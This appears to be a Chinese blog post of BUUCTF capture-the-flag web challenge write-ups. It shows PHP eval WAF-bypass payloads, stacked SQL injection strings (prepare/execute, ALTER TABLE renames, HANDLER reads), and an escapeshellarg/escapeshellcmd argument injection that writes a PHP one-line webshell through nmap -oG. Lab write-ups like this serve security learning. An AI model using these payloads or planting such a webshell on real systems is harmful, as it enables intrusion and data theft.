<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="buuctf刷题记录"><meta name="keywords" content="BUU"><meta name="author" content="George"><meta name="copyright" content="George"><title>buuctf刷题记录 | A.</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.6.1"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.6.1"><link rel="dns-prefetch" href="https://cdn.staticfile.org"><link rel="dns-prefetch" href="https://cdn.bootcss.com"><link rel="dns-prefetch" href="https://creativecommons.org"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"search.xml","languages":{"hits_empty":"We didn't find any results for the search: ${query}"}},
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  }
} </script><meta name="generator" content="Hexo 4.2.0"></head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar"><div class="toggle-sidebar-info text-center"><span data-toggle="Toggle article">Toggle site</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">Catalog</div><div class="sidebar-toc__progress"><span class="progress-notice">You've read</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#RoarCTF-2019-Easy-Calc"><span class="toc-number">1.</span> <span class="toc-text">[RoarCTF 2019]Easy Calc</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#方法一"><span class="toc-number">1.1.</span> <span class="toc-text">方法一</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#方法二"><span class="toc-number">1.2.</span> <span class="toc-text">方法二</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#强网杯-2019-随便注-amp-amp-GYCTF2020-Blacklist"><span class="toc-number">2.</span> <span class="toc-text">[强网杯 2019]随便注  &amp;&amp;  [GYCTF2020]Blacklist</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#强网杯"><span class="toc-number">2.1.</span> <span class="toc-text">强网杯</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#法一：预编译"><span class="toc-number">2.1.1.</span> <span class="toc-text">法一：预编译</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#法二：更改表名列名"><span class="toc-number">2.1.2.</span> <span class="toc-text">法二：更改表名列名</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#GYCTF"><span class="toc-number">2.2.</span> <span class="toc-text">GYCTF</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#这里引进一种新的方法handler"><span class="toc-number">2.2.1.</span> <span class="toc-text">这里引进一种新的方法handler</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#BUUCTF-2018-Online-Tool"><span class="toc-number">3.</span> <span class="toc-text">[BUUCTF 2018]Online Tool</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#GXYCTF2019-禁止套娃"><span class="toc-number">4.</span> <span class="toc-text">[GXYCTF2019]禁止套娃</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#安洵杯-2019-easy-web"><span class="toc-number">5.</span> <span class="toc-text">[安洵杯 2019]easy_web</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#BUUCTF-BJDCTF2020-Mark-loves-cat【php变量覆盖】"><span class="toc-number">6.</span> <span class="toc-text">BUUCTF [BJDCTF2020]Mark loves cat【php变量覆盖】</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#变量覆盖四种情况"><span class="toc-number">6.1.</span> <span class="toc-text">变量覆盖四种情况</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#第一种：如上题所示，出现类似于-x-y的语句"><span class="toc-number">6.1.1.</span> <span class="toc-text">第一种：如上题所示，出现类似于$$x &#x3D; $$y的语句</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#第二种：extract-函数使用不当【extract参数未设置】"><span class="toc-number">6.1.2.</span> <span class="toc-text">第二种：extract()函数使用不当【extract参数未设置】</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#第三种：parse-str-函数使用不当【magic-quotes-gpc未开启】"><span class="toc-number">6.1.3.</span> <span class="toc-text">第三种：parse_str()函数使用不当【magic_quotes_gpc未开启】</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#第四种情况：import-request-variables-使用不当【register-globals被禁止】"><span class="toc-number">6.1.4.</span> <span class="toc-text">第四种情况：import_request_variables()使用不当【register_globals被禁止】</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#BJDCTF2020-The-mystery-of-ip"><span class="toc-number">6.2.</span> <span class="toc-text">[BJDCTF2020]The mystery of ip</span></a></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/avatar.png"></div><div class="author-info__name text-center">George</div><div class="author-info__description text-center">Here recording my growth of technology and hope you can gain something here.</div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">Articles</span><span class="pull-right">76</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">Tags</span><span class="pull-right">18</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">Categories</span><span class="pull-right">17</span></a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(https://Albatross-G.github.io/img/a1.png)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">A.</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus"><a class="site-page social-icon search"><i class="fa fa-search"></i><span> Search</span></a><a class="site-page" href="/">Home</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/tags">Tags</a><a class="site-page" href="/categories">Categories</a></span></div><div id="post-info"><div id="post-title">buuctf刷题记录</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2020-08-02</time></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h1 id="RoarCTF-2019-Easy-Calc"><a href="#RoarCTF-2019-Easy-Calc" class="headerlink" title="[RoarCTF 2019]Easy Calc"></a>[RoarCTF 2019]Easy Calc</h1><h2 id="方法一"><a href="#方法一" class="headerlink" title="方法一"></a>方法一</h2><p>查看源代码，发现存在waf（<em>Web Application Firewall</em>）：</p>
<p><img src="/2020/08/02/buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/easycalc1.png" alt="easycalc1"></p>
<p>找到calc.php，打开发现如下源代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">isset</span>($_GET[<span class="string">'num'</span>]))&#123;</span><br><span class="line">    show_source(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        $str = $_GET[<span class="string">'num'</span>];</span><br><span class="line">        $blacklist = [<span class="string">' '</span>, <span class="string">'\t'</span>, <span class="string">'\r'</span>, <span class="string">'\n'</span>,<span class="string">'\''</span>, <span class="string">'"'</span>, <span class="string">'`'</span>, <span class="string">'\['</span>, <span class="string">'\]'</span>,<span class="string">'\$'</span>,<span class="string">'\\'</span>,<span class="string">'\^'</span>];</span><br><span class="line">        <span class="keyword">foreach</span> ($blacklist <span class="keyword">as</span> $blackitem) &#123;</span><br><span class="line">                <span class="keyword">if</span> (preg_match(<span class="string">'/'</span> . $blackitem . <span class="string">'/m'</span>, $str)) &#123;</span><br><span class="line">                        <span class="keyword">die</span>(<span class="string">"what are you want to do?"</span>);</span><br><span class="line">                &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">eval</span>(<span class="string">'echo '</span>.$str.<span class="string">';'</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>尝试构造payload：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;node3.buuoj.cn:26375&#x2F;calc.php? num&#x3D;a</span><br></pre></td></tr></table></figure>

<blockquote>
<p>为什么要在num前加一个空格？</p>
<p>答：假如waf不允许num变量传递字母，可以在num前加个空格，这样waf就找不到num这个变量了，因为现在的变量叫“ num”，而不是“num”。但php在解析的时候，会先把空格给去掉，这样我们的代码还能正常运行，还上传了非法字符。</p>
<p>发现过滤怎么办？</p>
<p>答：用chr()转ascii再进行拼接</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;node3.buuoj.cn:26375&#x2F;calc.php? num&#x3D;phpinfo()</span><br></pre></td></tr></table></figure>

<p>发现可以正常运行，于是扫描根目录：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;node3.buuoj.cn:26375&#x2F;calc.php? num&#x3D;var_dump(scandir(chr(47)))</span><br></pre></td></tr></table></figure>

<p>其中47转化为“/”，也就是扫描根目录，得到：</p>
<p><img src="/2020/08/02/buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/easycalc2.png" alt="easycalc2"></p>
<p>接着打开这个f1agg即可：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;node3.buuoj.cn:26375&#x2F;calc.php? num&#x3D;file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))</span><br></pre></td></tr></table></figure>

<p>这些字符转化过来就是：/f1agg</p>
<h2 id="方法二"><a href="#方法二" class="headerlink" title="方法二"></a>方法二</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;calc.php? num&#x3D;var_dump(base_convert(61693386291,10,36)(hex2bin(dechex(47))))</span><br></pre></td></tr></table></figure>

<p><img src="/2020/08/02/buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/easycalc3.png" alt="easycalc3"></p>
<p>这里其实是在利用当数字大于10时，其就会用字母表示，而36进制即可以表示出所有的字母</p>
<p><img src="/2020/08/02/buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/easycalc4.png" alt="easycalc4"></p>
<p>又发现dechex函数可以把10进制转换为16进制，而hex2bin将十六进制数转换为ASCII</p>
<p>可以构造出readfile(/f1agg)来读取文件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">构造为：base_convert(2146934604002,10,36)(hex2bin(dechex(47)).base_convert(25254448,10,36))</span><br></pre></td></tr></table></figure>

<p>当然也可以构造file_get_contents()，只不过可能比较麻烦，因为字母和下划线所用的函数不同，要叠加来叠加去</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;calc.php? num&#x3D;(base_convert(723938,10,36).hex2bin(dechex(95)).base_convert(21269,10,36).hex2bin(dechex(95)).base_convert(994052860192,10,36))</span><br><span class="line">(hex2bin(dechex(47)).base_convert(25254448,10,36))</span><br></pre></td></tr></table></figure>

<p>解析出来就是file_get_contents(/f1agg)</p>
<h1 id="强网杯-2019-随便注-amp-amp-GYCTF2020-Blacklist"><a href="#强网杯-2019-随便注-amp-amp-GYCTF2020-Blacklist" class="headerlink" title="[强网杯 2019]随便注  &amp;&amp;  [GYCTF2020]Blacklist"></a>[强网杯 2019]随便注  &amp;&amp;  [GYCTF2020]Blacklist</h1><p>这两道题比较像，就放在一起整理了。</p>
<h2 id="强网杯"><a href="#强网杯" class="headerlink" title="强网杯"></a>强网杯</h2><p>先是最基本的发现注入点：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?inject&#x3D;1&#39;--+</span><br></pre></td></tr></table></figure>

<p>然后想用基本的联合注入，但是发现过滤了一系列东西：</p>
<p><img src="/2020/08/02/buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/2-1.png" alt="2-1"></p>
<p>于是就想到堆叠注入先读表名：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?inject&#x3D;1&#39;;show tables;--+</span><br></pre></td></tr></table></figure>

<p><img src="/2020/08/02/buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/2-2.png" alt="2-2"></p>
<p>然后试着读读列名</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?inject&#x3D;1&#39;;show columns from &#96;1919810931114514&#96;;--+</span><br><span class="line">或者</span><br><span class="line">?inject&#x3D;1&#39;;desc &#96;1919810931114514&#96;;--+</span><br></pre></td></tr></table></figure>

<p>分别读出两个表里的内容：</p>
<p><img src="/2020/08/02/buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/2-3.png" alt="2-3"></p>
<p><img src="/2020/08/02/buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/2-4.png" alt="2-4"></p>
<p>现在我们的目标语句是</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from 1919810931114514</span><br></pre></td></tr></table></figure>

<p>但是我们无法绕过select，于是就要想到别的办法</p>
<h3 id="法一：预编译"><a href="#法一：预编译" class="headerlink" title="法一：预编译"></a>法一：<strong>预编译</strong></h3><p>首先给出预编译的一些基本语句：</p>
<blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">set用于设置变量名和值</span><br><span class="line">prepare用于预备一个语句，并赋予名称，以后可以引用该语句</span><br><span class="line">execute执行语句</span><br><span class="line">deallocate prepare用来释放掉预处理的语句</span><br></pre></td></tr></table></figure>
</blockquote>
<p>于是我们可以构造payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">?inject&#x3D;-1&#39;;</span><br><span class="line">set @sql &#x3D; CONCAT(&#39;se&#39;,&#39;lect * from &#96;1919810931114514&#96;;&#39;);</span><br><span class="line">prepare stmt from @sql;</span><br><span class="line">EXECUTE stmt;</span><br><span class="line">#</span><br></pre></td></tr></table></figure>

<p>发现</p>
<p><img src="/2020/08/02/buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/2-5.png" alt="2-5"></p>
<p>这里简单，只要将set和prepare改成大写即可</p>
<h3 id="法二：更改表名列名"><a href="#法二：更改表名列名" class="headerlink" title="法二：更改表名列名"></a>法二：<strong>更改表名列名</strong></h3><p>通过爆破点以及其上的分析，我们可以大胆猜测后台语句是</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from words where id&#x3D;&#39;&#39;</span><br></pre></td></tr></table></figure>

<p>这样我们只要把1919810931114514改成words，然后将flag字段改成id或者添加一个id字段</p>
<blockquote>
<p>修改表名和列名的语法</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">修改表名(将表名user改为users)</span><br><span class="line">alter table user rename to users;</span><br><span class="line"></span><br><span class="line">修改列名(将字段名username改为name)</span><br><span class="line">alter table users change uesrname name varchar(30);</span><br></pre></td></tr></table></figure>
</blockquote>
<p>可以构造payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">1&#39;;</span><br><span class="line">alter table words rename to words1;</span><br><span class="line">alter table &#96;1919810931114514&#96; rename to words;</span><br><span class="line">alter table words change flag id varchar(50);</span><br><span class="line">#</span><br></pre></td></tr></table></figure>

<p>那么现在我们的语句就相当于</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from 1919810931114514 where flag&#x3D;&#39;&#39;</span><br></pre></td></tr></table></figure>

<p>此时只要构造一个永真语句即可获得flag</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?inject&#x3D;1&#39; or 1&#x3D;&#39;1</span><br></pre></td></tr></table></figure>





<h2 id="GYCTF"><a href="#GYCTF" class="headerlink" title="GYCTF"></a>GYCTF</h2><p>找注入点什么的都几乎一样，可是这次的过滤就更加严格了：<img src="/2020/08/02/buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/2-6.png" alt="2-6"></p>
<p>像上一关两种方法的set和alter都不能使用了</p>
<h3 id="这里引进一种新的方法handler"><a href="#这里引进一种新的方法handler" class="headerlink" title="这里引进一种新的方法handler"></a>这里引进一种新的方法handler</h3><blockquote>
<p>通过HANDLER tbl_name OPEN打开一张表，无返回结果， 实际上我们在这里声明了一个名为tb1_name的句柄。 </p>
<p>通过HANDLER tbl_name READ FIRST获取句柄的第一行， 通过READ NEXT依次获取其它行。</p>
<p>最后一行执行之后再执行NEXT会返回一个空的结果。 </p>
<p>通过HANDLER tbl_name CLOSE来关闭打开的句柄。 </p>
</blockquote>
<p>我们就可以构造payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">1&#39;;</span><br><span class="line">handler FlagHere open;</span><br><span class="line">handler FlagHere read first;</span><br><span class="line">Handler FlagHere close;</span><br><span class="line">#</span><br></pre></td></tr></table></figure>







<h1 id="BUUCTF-2018-Online-Tool"><a href="#BUUCTF-2018-Online-Tool" class="headerlink" title="[BUUCTF 2018]Online Tool"></a>[BUUCTF 2018]Online Tool</h1><p>进去直接看到一串源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_SERVER[<span class="string">'HTTP_X_FORWARDED_FOR'</span>])) &#123;</span><br><span class="line">    $_SERVER[<span class="string">'REMOTE_ADDR'</span>] = $_SERVER[<span class="string">'HTTP_X_FORWARDED_FOR'</span>];</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">isset</span>($_GET[<span class="string">'host'</span>])) &#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    $host = $_GET[<span class="string">'host'</span>];</span><br><span class="line">    $host = escapeshellarg($host);</span><br><span class="line">    $host = escapeshellcmd($host);</span><br><span class="line">    $sandbox = md5(<span class="string">"glzjin"</span>. $_SERVER[<span class="string">'REMOTE_ADDR'</span>]);</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">'you are in sandbox '</span>.$sandbox;</span><br><span class="line">    @mkdir($sandbox);</span><br><span class="line">    chdir($sandbox);</span><br><span class="line">    <span class="keyword">echo</span> system(<span class="string">"nmap -T5 -sT -Pn --host-timeout 2 -F "</span>.$host);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>我们首先看到<code>escapeshellarg</code>和<code>escapeshellcmd</code>两个函数，不太了解，所以去大概查了一下，<a href="https://paper.seebug.org/164/" target="_blank" rel="noopener">PHP escapeshellarg()+escapeshellcmd() 之殇</a>，里面讲到了两个函数结合出现时会有漏洞：</p>
<blockquote>
<p>我们详细分析一下：</p>
<ol>
<li>传入的参数是：<code>172.17.0.2&#39; -v -d a=1</code></li>
<li>经过<code>escapeshellarg</code>处理后变成了<code>&#39;172.17.0.2&#39;\&#39;&#39; -v -d a=1&#39;</code>，即先对单引号转义，再用单引号将左右两部分括起来从而起到连接的作用。</li>
<li>经过<code>escapeshellcmd</code>处理后变成<code>&#39;172.17.0.2&#39;\\&#39;&#39; -v -d a=1\&#39;</code>，这是因为<code>escapeshellcmd</code>对<code>\</code>以及最后那个<strong>不配对儿</strong>的引号进行了转义：<a href="http://php.net/manual/zh/function.escapeshellcmd.php" target="_blank" rel="noopener">http://php.net/manual/zh/function.escapeshellcmd.php</a></li>
<li>最后执行的命令是<code>curl &#39;172.17.0.2&#39;\\&#39;&#39; -v -d a=1\&#39;</code>，由于中间的<code>\\</code>被解释为<code>\</code>而不再是转义字符，所以后面的<code>&#39;</code>没有被转义，与再后面的<code>&#39;</code>配对儿成了一个空白连接符。所以可以简化为<code>curl 172.17.0.2\ -v -d a=1&#39;</code>，即向<code>172.17.0.2\</code>发起请求，POST 数据为<code>a=1&#39;</code>。</li>
</ol>
<p>如果不加这个单引号，原句最后会变成<code>curl &#39;172.17.0.2 -v -d a=1&#39;</code>，也就相当于无法给curl请求增加参数</p>
</blockquote>
<p>看回到我们这题：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo system(&quot;nmap -T5 -sT -Pn --host-timeout 2 -F &quot;.$host);</span><br></pre></td></tr></table></figure>

<p>因为<code>escapeshellcmd</code>函数会过滤掉<code>；</code>，所以不能使用类似于如下的注入</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">127.0.0.1;ls</span><br></pre></td></tr></table></figure>

<p>那我们就只能思考如何利用nmap命令，经过查资料我们发现：nmap的-oG参数-，这个参数可以实现将命令和结果写到文件。</p>
<p>下面我们开始构造payload，利用本地测试方便一些【在Windows上测试一直出现奇奇怪怪的问题，必须要在linux上测试】</p>
<p>测试环境如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">    $a=<span class="string">"payload"</span>;</span><br><span class="line">    $b=escapeshellarg($a);</span><br><span class="line">    $c=escapeshellcmd($b);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">echo</span> $a.<span class="string">"\n"</span>;</span><br><span class="line">    <span class="keyword">echo</span> $b.<span class="string">"\n"</span>;</span><br><span class="line">    <span class="keyword">echo</span> $c.<span class="string">"\n"</span>;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>但是如果我们直接构造</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload&#x3D;xxx -oG ag.php</span><br></pre></td></tr></table></figure>

<p><img src="/2020/08/02/buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/3-1.png" alt="3-1"></p>
<p>这样整条语句就变成了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -T5 -sT -Pn --host-timeout 2 -F &#39;xxx -oG ag.php&#39;</span><br></pre></td></tr></table></figure>

<p>无法执行引号里的语句，于是我们构造</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload&#x3D;&#39; xxx -oG ag.php &#39;</span><br></pre></td></tr></table></figure>

<p><img src="/2020/08/02/buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/3-2.png" alt="3-2"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">nmap -T5 -sT -Pn --host-timeout 2 -F &#39;&#39;\\&#39;&#39; xxx -oG ag.php &#39;\\&#39;&#39;&#39;</span><br><span class="line">化简后即</span><br><span class="line">nmap -T5 -sT -Pn --host-timeout 2 -F \ xxx -oG ag.php &#39;\&#39;</span><br><span class="line">即可成功执行</span><br></pre></td></tr></table></figure>





<p>像这种上传的东西，我们可以先上传个phpinfo()试试水</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?host&#x3D;&#39; &lt;?php phpinfo();?&gt; -oG ag.php &#39;</span><br></pre></td></tr></table></figure>

<p><img src="/2020/08/02/buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/3-3.png" alt="3-3">)<img src="/2020/08/02/buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/3-4.png" alt="3-4"></p>
<p>发现成功，接下来传一句话木马，连接antsword即可</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?host&#x3D;&#39; &lt;?php @eval($_POST[&quot;ag&quot;]);?&gt; -oG ag.php &#39;</span><br></pre></td></tr></table></figure>









<h1 id="GXYCTF2019-禁止套娃"><a href="#GXYCTF2019-禁止套娃" class="headerlink" title="[GXYCTF2019]禁止套娃"></a>[GXYCTF2019]禁止套娃</h1><p>先用扫描器扫描一下，发现了flag.php和/.git，但是直接读取flag.php失败。</p>
<p>于是用GitHack扫一下拿到源码，但是我这里老是扫不出来，就很难受。</p>
<p><img src="/2020/08/02/buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/4-1.png" alt="4-1"></p>
<p>所以直接拿了源码来分析下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include</span> <span class="string">"flag.php"</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"flag在哪里呢？&lt;br&gt;"</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'exp'</span>]))&#123;</span><br><span class="line">    <span class="keyword">if</span> (!preg_match(<span class="string">'/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i'</span>, $_GET[<span class="string">'exp'</span>])) &#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="string">';'</span> === preg_replace(<span class="string">'/[a-z,_]+\((?R)?\)/'</span>, <span class="keyword">NULL</span>, $_GET[<span class="string">'exp'</span>])) &#123;</span><br><span class="line">            <span class="keyword">if</span> (!preg_match(<span class="string">'/et|na|info|dec|bin|hex|oct|pi|log/i'</span>, $_GET[<span class="string">'exp'</span>])) &#123;</span><br><span class="line">                <span class="comment">// echo $_GET['exp'];</span></span><br><span class="line">                @<span class="keyword">eval</span>($_GET[<span class="string">'exp'</span>]);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">else</span>&#123;</span><br><span class="line">                <span class="keyword">die</span>(<span class="string">"还差一点哦！"</span>);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span>&#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">"再好好想想！"</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">"还想读flag，臭弟弟！"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// highlight_file(__FILE__);</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

